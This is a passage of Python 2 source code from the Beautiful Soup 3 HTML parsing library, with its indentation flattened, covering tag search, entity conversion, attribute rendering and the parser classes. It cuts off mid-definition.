def _findAll(self, name, attrs, text, limit, generator, **kwargs):
"Iterates over a generator looking for things that match."
if isinstance(name, SoupStrainer):
strainer = name
else:
# Build a SoupStrainer
strainer = SoupStrainer(name, attrs, text, **kwargs)
results = ResultSet(strainer)
g = generator()
while True:
try:
i = g.next()
except StopIteration:
break
if i:
found = strainer.search(i)
if found:
results.append(found)
if limit and len(results) >= limit:
break
return results
#These Generators can be used to navigate starting from both
#NavigableStrings and Tags.
def nextGenerator(self):
i = self
while i:
i = i.next
yield i
def nextSiblingGenerator(self):
i = self
while i:
i = i.nextSibling
yield i
def previousGenerator(self):
i = self
while i:
i = i.previous
yield i
def previousSiblingGenerator(self):
i = self
while i:
i = i.previousSibling
yield i
def parentGenerator(self):
i = self
while i:
i = i.parent
yield i
# Utility methods
def substituteEncoding(self, str, encoding=None):
encoding = encoding or "utf-8"
return str.replace("%SOUP-ENCODING%", encoding)
def toEncoding(self, s, encoding=None):
"""Encodes an object to a string in some encoding, or to Unicode.
."""
if isinstance(s, unicode):
if encoding:
s = s.encode(encoding)
elif isinstance(s, str):
if encoding:
s = s.encode(encoding)
else:
s = unicode(s)
else:
if encoding:
s = self.toEncoding(str(s), encoding)
else:
s = unicode(s)
return s
class NavigableString(unicode, PageElement):
def __new__(cls, value):
"""Create a new NavigableString.
When unpickling a NavigableString, this method is called with
the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be
passed in to the superclass's __new__ or the superclass won't know
how to handle non-ASCII characters.
"""
if isinstance(value, unicode):
return unicode.__new__(cls, value)
return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING)
def __getnewargs__(self):
return (unicode(self),)
def __getattr__(self, attr):
"""text.string gives you text. This is for backwards
compatibility for Navigable*String, but for CData* it lets you
get the string without the CData wrapper."""
if attr == 'string':
return self
else:
raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr)
def encode(self, encoding=DEFAULT_OUTPUT_ENCODING):
return self.decode().encode(encoding)
def decodeGivenEventualEncoding(self, eventualEncoding):
return self
class CData(NavigableString):
def decodeGivenEventualEncoding(self, eventualEncoding):
return u'<![CDATA[' + self + u']]>'
class ProcessingInstruction(NavigableString):
def decodeGivenEventualEncoding(self, eventualEncoding):
output = self
if u'%SOUP-ENCODING%' in output:
output = self.substituteEncoding(output, eventualEncoding)
return u'<?' + output + u'?>'
class Comment(NavigableString):
def decodeGivenEventualEncoding(self, eventualEncoding):
return u'<!--' + self + u'-->'
class Declaration(NavigableString):
def decodeGivenEventualEncoding(self, eventualEncoding):
return u'<!' + self + u'>'
class Tag(PageElement):
"""Represents a found HTML tag with its attributes and contents."""
def _invert(h):
"Cheap function to invert a hash."
i = {}
for k,v in h.items():
i[v] = k
return i
XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'",
"quot" : '"',
"amp" : "&",
"lt" : "<",
"gt" : ">" }
XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS)
def _convertEntities(self, match):
"""Used in a call to re.sub to replace HTML, XML, and numeric
entities with the appropriate Unicode characters. If HTML
entities are being converted, any unrecognized entities are
escaped."""
x = match.group(1)
if self.convertHTMLEntities and x in name2codepoint:
return unichr(name2codepoint[x])
elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS:
if self.convertXMLEntities:
return self.XML_ENTITIES_TO_SPECIAL_CHARS[x]
else:
return u'&%s;' % x
elif len(x) > 0 and x[0] == '#':
# Handle numeric entities
if len(x) > 1 and x[1] == 'x':
return unichr(int(x[2:], 16))
else:
return unichr(int(x[1:]))
elif self.escapeUnrecognizedEntities:
return u'&%s;' % x
else:
return u'&%s;' % x
def __init__(self, parser, name, attrs=None, parent=None,
previous=None):
"Basic constructor."
# We don't actually store the parser object: that lets extracted
# chunks be garbage-collected
self.parserClass = parser.__class__
self.isSelfClosing = parser.isSelfClosingTag(name)
self.name = name
if attrs == None:
attrs = []
self.attrs = attrs
self.contents = []
self.setup(parent, previous)
self.hidden = False
self.containsSubstitutions = False
self.convertHTMLEntities = parser.convertHTMLEntities
self.convertXMLEntities = parser.convertXMLEntities
self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities
def convert(kval):
"Converts HTML, XML and numeric entities in the attribute value."
k, val = kval
if val is None:
return kval
return (k, re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);",
self._convertEntities, val))
self.attrs = map(convert, self.attrs)
def get(self, key, default=None):
"""Returns the value of the 'key' attribute for the tag, or
the value given for 'default' if it doesn't have that
attribute."""
return self._getAttrMap().get(key, default)
def has_key(self, key):
return self._getAttrMap().has_key(key)
def __getitem__(self, key):
"""tag[key] returns the value of the 'key' attribute for the tag,
and throws an exception if it's not there."""
return self._getAttrMap()[key]
def __iter__(self):
"Iterating over a tag iterates over its contents."
return iter(self.contents)
def __len__(self):
"The length of a tag is the length of its list of contents."
return len(self.contents)
def __contains__(self, x):
return x in self.contents
def __nonzero__(self):
"A tag is non-None even if it has no contents."
return True
def __setitem__(self, key, value):
"""Setting tag[key] sets the value of the 'key' attribute for the
tag."""
self._getAttrMap()
self.attrMap[key] = value
found = False
for i in range(0, len(self.attrs)):
if self.attrs[i][0] == key:
self.attrs[i] = (key, value)
found = True
if not found:
self.attrs.append((key, value))
self._getAttrMap()[key] = value
def __delitem__(self, key):
"Deleting tag[key] deletes all 'key' attributes for the tag."
for item in self.attrs:
if item[0] == key:
self.attrs.remove(item)
#We don't break because bad HTML can define the same
#attribute multiple times.
self._getAttrMap()
if self.attrMap.has_key(key):
del self.attrMap[key]
def __call__(self, *args, **kwargs):
"""Calling a tag like a function is the same as calling its
findAll() method. Eg. tag('a') returns a list of all the A tags
found within this tag."""
return apply(self.findAll, args, kwargs)
def __getattr__(self, tag):
#print "Getattr %s.%s" % (self.__class__, tag)
if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3:
return self.find(tag[:-3])
elif tag.find('__') != 0:
return self.find(tag)
raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag)
def __eq__(self, other):
"""Returns true iff this tag has the same name, the same attributes,
and the same contents (recursively) as the given tag.
NOTE: right now this will return false if two tags have the
same attributes in a different order. Should this be fixed?"""
if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other):
return False
for i in range(0, len(self.contents)):
if self.contents[i] != other.contents[i]:
return False
return True
def __ne__(self, other):
"""Returns true iff this tag is not identical to the other tag,
as defined in __eq__."""
return not self == other
def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING):
"""Renders this tag as a string."""
return self.decode(eventualEncoding=encoding)
BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|"
+ "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)"
+ ")")
def _sub_entity(self, x):
"""Used with a regular expression to substitute the
appropriate XML entity for an XML special character."""
return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";"
def __unicode__(self):
return self.decode()
def __str__(self):
return self.encode()
def encode(self, encoding=DEFAULT_OUTPUT_ENCODING,
prettyPrint=False, indentLevel=0):
return self.decode(prettyPrint, indentLevel, encoding).encode(encoding)
def decode(self, prettyPrint=False, indentLevel=0,
eventualEncoding=DEFAULT_OUTPUT_ENCODING):
"""Returns a string or Unicode representation of this tag and
its contents. To get Unicode, pass None for encoding."""
attrs = []
if self.attrs:
for key, val in self.attrs:
fmt = '%s="%s"'
if isString(val):
if (self.containsSubstitutions
and eventualEncoding is not None
and '%SOUP-ENCODING%' in val):
val = self.substituteEncoding(val, eventualEncoding)
# The attribute value either:
#
# * Contains no embedded double quotes or single quotes.
# No problem: we enclose it in double quotes.
# * Contains embedded single quotes. No problem:
# double quotes work here too.
# * Contains embedded double quotes. No problem:
# we enclose it in single quotes.
# * Embeds both single _and_ double quotes. This
# can't happen naturally, but it can happen if
# you modify an attribute value after parsing
# the document. Now we have a bit of a
# problem. We solve it by enclosing the
# attribute in single quotes, and escaping any
# embedded single quotes to XML entities.
if '"' in val:
fmt = "%s='%s'"
if "'" in val:
# TODO: replace with apos when
# appropriate.
val = val.replace("'", "&squot;")
# Now we're okay w/r/t quotes. But the attribute
# value might also contain angle brackets, or
# ampersands that aren't part of entities. We need
# to escape those to XML entities too.
val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val)
if val is None:
# Handle boolean attributes.
decoded = key
else:
decoded = fmt % (key, val)
attrs.append(decoded)
close = ''
closeTag = ''
if self.isSelfClosing:
close = ' /'
else:
closeTag = '</%s>' % self.name
indentTag, indentContents = 0, 0
if prettyPrint:
indentTag = indentLevel
space = (' ' * (indentTag-1))
indentContents = indentTag + 1
contents = self.decodeContents(prettyPrint, indentContents,
eventualEncoding)
if self.hidden:
s = contents
else:
s = []
attributeString = ''
if attrs:
attributeString = ' ' + ' '.join(attrs)
if prettyPrint:
s.append(space)
s.append('<%s%s%s>' % (self.name, attributeString, close))
if prettyPrint:
s.append("\n")
s.append(contents)
if prettyPrint and contents and contents[-1] != "\n":
s.append("\n")
if prettyPrint and closeTag:
s.append(space)
s.append(closeTag)
if prettyPrint and closeTag and self.nextSibling:
s.append("\n")
s = ''.join(s)
return s
def decompose(self):
"""Recursively destroys the contents of this tree."""
contents = [i for i in self.contents]
for i in contents:
if isinstance(i, Tag):
i.decompose()
else:
i.extract()
self.extract()
def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING):
return self.encode(encoding, True)
def encodeContents(self, encoding=DEFAULT_OUTPUT_ENCODING,
prettyPrint=False, indentLevel=0):
return self.decodeContents(prettyPrint, indentLevel).encode(encoding)
def decodeContents(self, prettyPrint=False, indentLevel=0,
eventualEncoding=DEFAULT_OUTPUT_ENCODING):
"""Renders the contents of this tag as a string in the given
encoding. If encoding is None, returns a Unicode string.."""
s=[]
for c in self:
text = None
if isinstance(c, NavigableString):
text = c.decodeGivenEventualEncoding(eventualEncoding)
elif isinstance(c, Tag):
s.append(c.decode(prettyPrint, indentLevel, eventualEncoding))
if text and prettyPrint:
text = text.strip()
if text:
if prettyPrint:
s.append(" " * (indentLevel-1))
s.append(text)
if prettyPrint:
s.append("\n")
return ''.join(s)
#Soup methods
def find(self, name=None, attrs={}, recursive=True, text=None,
**kwargs):
"""Return only the first child of this Tag matching the given
criteria."""
r = None
l = self.findAll(name, attrs, recursive, text, 1, **kwargs)
if l:
r = l[0]
return r
findChild = find
def findAll(self, name=None, attrs={}, recursive=True, text=None,
limit=None, **kwargs):
"""Extracts a list of Tag objects that match the given
criteria. You can specify the name of the Tag and any
attributes you want the Tag to have.
The value of a key-value pair in the 'attrs' map can be a
string, a list of strings, a regular expression object, or a
callable that takes a string and returns whether or not the
string matches for some custom definition of 'matches'. The
same is true of the tag name."""
generator = self.recursiveChildGenerator
if not recursive:
generator = self.childGenerator
return self._findAll(name, attrs, text, limit, generator, **kwargs)
findChildren = findAll
# Pre-3.x compatibility methods. Will go away in 4.0.
first = find
fetch = findAll
def fetchText(self, text=None, recursive=True, limit=None):
return self.findAll(text=text, recursive=recursive, limit=limit)
def firstText(self, text=None, recursive=True):
return self.find(text=text, recursive=recursive)
# 3.x compatibility methods. Will go away in 4.0.
def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING,
prettyPrint=False, indentLevel=0):
if encoding is None:
return self.decodeContents(prettyPrint, indentLevel, encoding)
else:
return self.encodeContents(encoding, prettyPrint, indentLevel)
#Private methods
def _getAttrMap(self):
"""Initializes a map representation of this tag's attributes,
if not already initialized."""
if not getattr(self, 'attrMap'):
self.attrMap = {}
for (key, value) in self.attrs:
self.attrMap[key] = value
return self.attrMap
#Generator methods
def recursiveChildGenerator(self):
if not len(self.contents):
raise StopIteration
stopNode = self._lastRecursiveChild().next
current = self.contents[0]
while current is not stopNode:
yield current
current = current.next
def childGenerator(self):
if not len(self.contents):
raise StopIteration
current = self.contents[0]
while current:
yield current
current = current.nextSibling
raise StopIteration
# Next, a couple classes to represent queries and their results.
class SoupStrainer:
"""Encapsulates a number of ways of matching a markup element (tag or
text)."""
def __init__(self, name=None, attrs={}, text=None, **kwargs):
self.name = name
if isString(attrs):
kwargs['class'] = attrs
attrs = None
if kwargs:
if attrs:
attrs = attrs.copy()
attrs.update(kwargs)
else:
attrs = kwargs
self.attrs = attrs
self.text = text
def __str__(self):
if self.text:
return self.text
else:
return "%s|%s" % (self.name, self.attrs)
def searchTag(self, markupName=None, markupAttrs={}):
found = None
markup = None
if isinstance(markupName, Tag):
markup = markupName
markupAttrs = markup
callFunctionWithTagData = callable(self.name) \
and not isinstance(markupName, Tag)
if (not self.name) \
or callFunctionWithTagData \
or (markup and self._matches(markup, self.name)) \
or (not markup and self._matches(markupName, self.name)):
if callFunctionWithTagData:
match = self.name(markupName, markupAttrs)
else:
match = True
markupAttrMap = None
for attr, matchAgainst in self.attrs.items():
if not markupAttrMap:
if hasattr(markupAttrs, 'get'):
markupAttrMap = markupAttrs
else:
markupAttrMap = {}
for k,v in markupAttrs:
markupAttrMap[k] = v
attrValue = markupAttrMap.get(attr)
if not self._matches(attrValue, matchAgainst):
match = False
break
if match:
if markup:
found = markup
else:
found = markupName
return found
def search(self, markup):
#print 'looking for %s in %s' % (self, markup)
found = None
# If given a list of items, scan it for a text element that
# matches.
if isList(markup) and not isinstance(markup, Tag):
for element in markup:
if isinstance(element, NavigableString) \
and self.search(element):
found = element
break
# If it's a Tag, make sure its name or attributes match.
# Don't bother with Tags if we're searching for text.
elif isinstance(markup, Tag):
if not self.text:
found = self.searchTag(markup)
# If it's text, make sure the text matches.
elif isinstance(markup, NavigableString) or \
isString(markup):
if self._matches(markup, self.text):
found = markup
else:
raise Exception, "I don't know how to match against a %s" \
% markup.__class__
return found
def _matches(self, markup, matchAgainst):
#print "Matching %s against %s" % (markup, matchAgainst)
result = False
if matchAgainst == True and type(matchAgainst) == types.BooleanType:
result = markup != None
elif callable(matchAgainst):
result = matchAgainst(markup)
else:
#Custom match methods take the tag as an argument, but all
#other ways of matching match the tag name as a string.
if isinstance(markup, Tag):
markup = markup.name
if markup is not None and not isString(markup):
markup = unicode(markup)
#Now we know that chunk is either a string, or None.
if hasattr(matchAgainst, 'match'):
# It's a regexp object.
result = markup and matchAgainst.search(markup)
elif (isList(matchAgainst)
and (markup is not None or not isString(matchAgainst))):
result = markup in matchAgainst
elif hasattr(matchAgainst, 'items'):
result = markup.has_key(matchAgainst)
elif matchAgainst and isString(markup):
if isinstance(markup, unicode):
matchAgainst = unicode(matchAgainst)
else:
matchAgainst = str(matchAgainst)
if not result:
result = matchAgainst == markup
return result
class ResultSet(list):
"""A ResultSet is just a list that keeps track of the SoupStrainer
that created it."""
def __init__(self, source):
list.__init__([])
self.source = source
# Now, some helper functions.
def isList(l):
"""Convenience method that works with all 2.x versions of Python
to determine whether or not something is listlike."""
return ((hasattr(l, '__iter__') and not isString(l))
or (type(l) in (types.ListType, types.TupleType)))
def isString(s):
"""Convenience method that works with all 2.x versions of Python
to determine whether or not something is stringlike."""
try:
return isinstance(s, unicode) or isinstance(s, basestring)
except NameError:
return isinstance(s, str)
def buildTagMap(default, *args):
"""Turns a list of maps, lists, or scalars into a single map.
Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and
NESTING_RESET_TAGS maps out of lists and partial maps."""
built = {}
for portion in args:
if hasattr(portion, 'items'):
#It's a map. Merge it.
for k,v in portion.items():
built[k] = v
elif isList(portion) and not isString(portion):
#It's a list. Map each item to the default.
for k in portion:
built[k] = default
else:
#It's a scalar. Map it to the default.
built[portion] = default
return built
# Now, the parser classes.
class HTMLParserBuilder(HTMLParser):
def __init__(self, soup):
HTMLParser.__init__(self)
self.soup = soup
# We inherit feed() and reset().
def handle_starttag(self, name, attrs):
if name == 'meta':
self.soup.extractCharsetFromMeta(attrs)
else:
self.soup.unknown_starttag(name, attrs)
def handle_endtag(self, name):
self.soup.unknown_endtag(name)
def handle_data(self, content):
self.soup.handle_data(content)
def _toStringSubclass(self, text, subclass):
"""Adds a certain piece of text to the tree as a NavigableString
subclass."""
self.soup.endData()
self.handle_data(text)
self.soup.endData(subclass)
def handle_pi(self, text):
"""Handle a processing instruction as a ProcessingInstruction
object, possibly one with a %SOUP-ENCODING% slot into which an
encoding will be plugged later."""
if text[:3] == "xml":
text = u"xml version='1.0' encoding='%SOUP-ENCODING%'"
self._toStringSubclass(text, ProcessingInstruction)
def handle_comment(self, text):
"Handle comments as Comment objects."
self._toStringSubclass(text, Comment)
def handle_charref(self, ref):
"Handle character references as data."
if self.soup.convertEntities:
data = unichr(int(ref))
else:
data = '&#%s;' % ref
self.handle_data(data)
def handle_entityref(self, ref):
"""Handle entity references as data, possibly converting known
HTML and/or XML entity references to the corresponding Unicode
characters."""
data = None
if self.soup.convertHTMLEntities:
try:
data = unichr(name2codepoint[ref])
except KeyError:
pass
if not data and self.soup.convertXMLEntities:
data = self.soup.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref)
if not data and self.soup.convertHTMLEntities and \
not self.soup.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref):
# TODO: We've got a problem here. We're told this is
# an entity reference, but it's not an XML entity
# reference or an HTML entity reference. Nonetheless,
# the logical thing to do is to pass it through as an
# unrecognized entity reference.
#
# Except: when the input is "&carol;" this function
# will be called with input "carol". When the input is
# "AT&T", this function will be called with input
# "T". We have no way of knowing whether a semicolon
# was present originally, so we don't know whether
# this is an unknown entity or just a misplaced
# ampersand.
#
# The more common case is a misplaced ampersand, so I
# escape the ampersand and omit the trailing semicolon.
data = "&%s" % ref
if not data:
# This case is different from the one above, because we
# haven't already gone through a supposedly comprehensive
# mapping of entities to Unicode characters. We might not
# have gone through any mapping at all. So the chances are
# very high that this is a real entity, and not a
# misplaced ampersand.
data = "&%s;" % ref
self.handle_data(data)
def handle_decl(self, data):
"Handle DOCTYPEs and the like as Declaration objects."
self._toStringSubclass(data, Declaration)
def parse_declaration(self, i):
"""Treat a bogus SGML declaration as raw data. Treat a CDATA
declaration as a CData object."""
j = None
if self.rawdata[i:i+9] == '<![CDATA[':
k = self.rawdata.find(']]>', i)
if k == -1:
k = len(self.rawdata)
data = self.rawdata[i+9:k]
j = k+3
self._toStringSubclass(data, CData)
else:
try:
j = HTMLParser.parse_declaration(self, i)
except HTMLParseError:
toHandle = self.rawdata[i:]
self.handle_data(toHandle)
j = i + len(toHandle)
return j
class BeautifulStoneSoup(Tag):
"""This class contains the basic parser and search code. It defines
a parser that knows nothing about tag behavior except for the
following:
You can't close a tag without closing all the tags it encloses.
That is, "<foo><bar></foo>" actually means
"<foo><bar></bar></foo>".
[Another possible explanation is "<foo><bar /></foo>", but since
this class defines no SELF_CLOSING_TAGS, it will never use that
explanation.]
This class is useful for parsing XML or made-up markup languages,
or when BeautifulSoup makes an assumption counter to what you were
expecting."""
SELF_CLOSING_TAGS = {}
NESTABLE_TAGS = {}
RESET_NESTING_TAGS = {}
QUOTE_TAGS = {}
PRESERVE_WHITESPACE_TAGS = []
MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'),
lambda x: x.group(1) + ' />'),
(re.compile('<!\s+([^<>]*)>'),
lambda x: '<!' + x.group(1) + '>')
]
ROOT_TAG_NAME = u'[document]'
HTML_ENTITIES = "html"
XML_ENTITIES = "xml"
XHTML_ENTITIES = "xhtml"
# TODO: This only exists for backwards-compatibility
ALL_ENTITIES = XHTML_ENTITIES
# Used when determining whether a text node is all whitespace and
# can be replaced with a single space. A text node that contains
# fancy Unicode spaces (usually non-breaking) should be left
# alone.
STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, }
def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None,
markupMassage=True, smartQuotesTo=XML_ENTITIES,
convertEntities=None, selfClosingTags=None, isHTML=False,
builder=HTMLParserBuilder):
"""The Soup object is initialized as the 'root tag', and the
provided markup (which can be a string or a file-like object)
is fed into the underlying parser.
HTMLParser will process most bad HTML, and the BeautifulSoup
class has some tricks for dealing with some HTML that kills
HTMLParser, but Beautiful Soup can nonetheless choke or lose data
if your data uses self-closing tags or declarations
incorrectly.
By default, Beautiful Soup uses regexes to sanitize input,
avoiding the vast majority of these problems. If the problems
don't apply to you, pass in False for markupMassage, and
you'll get better performance.
The default parser massage techniques fix the two most common
instances of invalid HTML that choke HTMLParser:
<br/> (No space between name of closing tag and tag close)
<! --Comment--> (Extraneous whitespace in declaration)
You can pass in a custom list of (RE object, replace method)
tuples to get Beautiful Soup to scrub your input the way you
want."""
self.parseOnlyThese = parseOnlyThese
self.fromEncoding = fromEncoding
self.smartQuotesTo = smartQuotesTo
self.convertEntities = convertEntities
# Set the rules for how we'll deal with the entities we
# encounter
if self.convertEntities:
# It doesn't make sense to convert encoded characters to
# entities even while you're converting entities to Unicode.
# Just convert it all to Unicode.
self.smartQuotesTo = None
if convertEntities == self.HTML_ENTITIES:
self.convertXMLEntities = False
self.convertHTMLEntities = True
self.escapeUnrecognizedEntities = True
elif convertEntities == self.XHTML_ENTITIES:
self.convertXMLEntities = True
self.convertHTMLEntities = True
self.escapeUnrecognizedEntities = False
elif convertEntities == self.XML_ENTITIES:
self.convertXMLEntities = True
self.convertHTMLEntities = False
self.escapeUnrecognizedEntities = False
else:
self.convertXMLEntities = False
self.convertHTMLEntities = False
self.escapeUnrecognizedEntities = False
self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags)
self.builder = builder(self)
self.reset()
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
self.markup = markup
self.markupMassage = markupMassage
try:
self._feed(isHTML=isHTML)
except StopParsing:
pass
self.markup = None # The markup can now be GCed.
self.builder = None # So can the builder.
def _feed(self, inDocumentEncoding=None, isHTML=False):
# Convert the document to Unicode.
markup = self.markup
if isinstance(markup, unicode):
if not hasattr(self, 'originalEncoding'):
self.originalEncoding = None
else:
dammit = UnicodeDammit\
(markup, [self.fromEncoding, inDocumentEncoding],
smartQuotesTo=self.smartQuotesTo, isHTML=isHTML)
markup = dammit.unicode
self.originalEncoding = dammit.originalEncoding
self.declaredHTMLEncoding = dammit.declaredHTMLEncoding
if markup:
if self.markupMassage:
if not isList(self.markupMassage):
self.markupMassage = self.MARKUP_MASSAGE
for fix, m in self.markupMassage:
markup = fix.sub(m, markup)
# TODO: We get rid of markupMassage so that the
# soup object can be deepcopied later on. Some
# Python installations can't copy regexes. If anyone
# was relying on the existence of markupMassage, this
# might cause problems.
del(self.markupMassage)
self.builder.reset()
self.builder.feed(markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def isSelfClosingTag(self, name):
"""Returns true iff the given string is the name of a
self-closing tag according to this parser."""
return self.SELF_CLOSING_TAGS.has_key(name) \
or self.instanceSelfClosingTags.has_key(name)
def reset(self):
Tag.__init__(self, self, self.ROOT_TAG_NAME)
self.hidden = 1
self.builder.reset()
self.currentData = []
self.currentTag = None
self.tagStack = []
self.quoteStack = []
self.pushTag(self)
def popTag(self):
tag = self.tagStack.pop()
# Tags with just one string-owning child get the child as a
# 'string' property, so that soup.tag.string is shorthand for
# soup.tag.contents[0]
if len(self.currentTag.contents) == 1 and \
isinstance(self.currentTag.contents[0], NavigableString):
self.currentTag.string = self.currentTag.contents[0]
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
#print "Push", tag.name
if self.currentTag:
self.currentTag.contents.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
def endData(self, containerClass=NavigableString):
if self.currentData:
currentData = u''.join(self.currentData)
if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and
not set([tag.name for tag in self.tagStack]).intersection(
self.PRESERVE_WHITESPACE_TAGS)):
if '\n' in currentData:
currentData = '\n'
else:
currentData = ' '
self.currentData = []
if self.parseOnlyThese and len(self.tagStack) <= 1 and \
(not self.parseOnlyThese.text or \
not self.parseOnlyThese.search(currentData)):
return
o = containerClass(currentData)
o.setup(self.currentTag, self.previous)
if self.previous:
self.previous.next = o
self.previous = o
self.currentTag.contents.append(o)
def _popToTag(self, name, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag. If inclusivePop is false, pops the tag
stack up to but *not* including the most recent instqance of
the given tag."""
#print "Popping to %s" % name
if name == self.ROOT_TAG_NAME:
return
numPops = 0
mostRecentTag = None
for i in range(len(self.tagStack)-1, 0, -1):
if name == self.tagStack[i].name:
numPops = len(self.tagStack)-i
break
if not inclusivePop:
numPops = numPops - 1
for i in range(0, numPops):
mostRecentTag = self.popTag()
return mostRecentTag
def _smartPop(self, name):
"""We need to pop up to the previous tag of this type, unless
one of this tag's nesting reset triggers comes between this
tag and the previous tag of this type, OR unless this tag is a
generic nesting trigger and another generic nesting trigger
comes between this tag and the previous tag of this type.
Examples:
<p>Foo<b>Bar *<p>* should pop to 'p', not 'b'.
<p>Foo<table>Bar *<p>* should pop to 'table', not 'p'.
<p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'.
<li><ul><li> *<li>* should pop to 'ul', not the first 'li'.
<tr><table><tr> *<tr>* should pop to 'table', not the first 'tr'
<td><tr><td> *<td>* should pop to 'tr', not the first 'td'
"""
nestingResetTriggers = self.NESTABLE_TAGS.get(name)
isNestable = nestingResetTriggers != None
isResetNesting = self.RESET_NESTING_TAGS.has_key(name)
popTo = None
inclusive = True
for i in range(len(self.tagStack)-1, 0, -1):
p = self.tagStack[i]
if (not p or p.name == name) and not isNestable:
#Non-nestable tags get popped to the top or to their
#last occurance.
popTo = name
break
if (nestingResetTriggers != None
and p.name in nestingResetTriggers) \
or (nestingResetTriggers == None and isResetNesting
and self.RESET_NESTING_TAGS.has_key(p.name)):
#If we encounter one of the nesting reset triggers
#peculiar to this tag, or we encounter another tag
#that causes nesting to reset, pop up to but not
#including that tag.
popTo = p.name
inclusive = False
break
p = p.parent
if popTo:
self._popToTag(popTo, inclusive)
def unknown_starttag(self, name, attrs, selfClosing=0):
#print "Start tag %s: %s" % (name, attrs)
if self.quoteStack:
#This is not a real tag.
#print "<%s> is not real!" % name
attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs))
self.handle_data('<%s%s>' % (name, attrs))
return
self.endData()
if not self.isSelfClosingTag(name) and not selfClosing:
self._smartPop(name)
if self.parseOnlyThese and len(self.tagStack) <= 1 \
and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)):
return
tag = Tag(self, name, attrs, self.currentTag, self.previous)
if self.previous:
self.previous.next = tag
self.previous = tag
self.pushTag(tag)
if selfClosing or self.isSelfClosingTag(name):
self.popTag()
if name in self.QUOTE_TAGS:
#print "Beginning quote (%s)" % name
self.quoteStack.append(name)
self.literal = 1
return tag
def unknown_endtag(self, name):
#print "End tag %s" % name
if self.quoteStack and self.quoteStack[-1] != name:
#This is not a real end tag.
#print "</%s> is not real!" % name
self.handle_data('</%s>' % name)
return
self.endData()
self._popToTag(name)
if self.quoteStack and self.quoteStack[-1] == name:
self.quoteStack.pop()
self.literal = (len(self.quoteStack) > 0)
def handle_data(self, data):
self.currentData.append(data)
def extractCharsetFromMeta(self, attrs):
self.unknown_starttag('meta', attrs)
class BeautifulSoup(BeautifulStoneSoup):
"""This parser knows the following facts about HTML:
* Some tags have no closing tag and should be interpreted as being
closed as soon as they are encountered.
* The text inside some tags (ie. 'script') may contain tags which
are not really part of the document and which should be parsed
as text, not tags. If you want to parse the text as tags, you can
always fetch it and parse it explicitly.
* Tag nesting rules:
Most tags can't be nested at all. For instance, the occurance of
a <p> tag should implicitly close the previous <p> tag.
<p>Para1<p>Para2
should be transformed into:
<p>Para1</p><p>Para2
Some tags can be nested arbitrarily. For instance, the occurance
of a <blockquote> tag should _not_ implicitly close the previous
<blockquote> tag.
Alice said: <blockquote>Bob said: <blockquote>Blah
should NOT be transformed into:
Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah
Some tags can be nested, but the nesting is reset by the
interposition of other tags. For instance, a <tr> tag should
implicitly close the previous <tr> tag within the same <table>,
but not close a <tr> tag in another table.
<table><tr>Blah<tr>Blah
should be transformed into:
<table><tr>Blah</tr><tr>Blah
but,
<tr>Blah<table><tr>Blah
should NOT be transformed into
<tr>Blah<table></tr><tr>Blah
Differing assumptions about tag nesting rules are a major source
of problems with the BeautifulSoup class. If BeautifulSoup is not
treating as nestable a tag your page author treats as nestable,
try ICantBelieveItsBeautifulSoup, MinimalSoup, or
BeautifulStoneSoup before writing your own subclass."""
def __init__(self, *args, **kwargs):
if not kwargs.has_key('smartQuotesTo'):
kwargs['smartQuotesTo'] = self.HTML_ENTITIES
kwargs['isHTML'] = True
BeautifulStoneSoup.__init__(self, *args, **kwargs)
SELF_CLOSING_TAGS = buildTagMap(None,
['br' , 'hr', 'input', 'img', 'meta',
'spacer', 'link', 'frame', 'base'])
PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea'])
QUOTE_TAGS = {'script' : None, 'textarea' : None}
#According to the HTML standard, each of these inline tags can
#contain another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup',
'center']
#According to the HTML standard, these block tags can contain
#another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del']
#Lists can contain other lists, but there are restrictions.
NESTABLE_LIST_TAGS = { 'ol' : [],
'ul' : [],
'li' : ['ul', 'ol'],
'dl' : [],
'dd' : ['dl'],
'dt' : ['dl'] }
#Tables can contain other tables, but there are restrictions.
NESTABLE_TABLE_TAGS = {'table' : [],
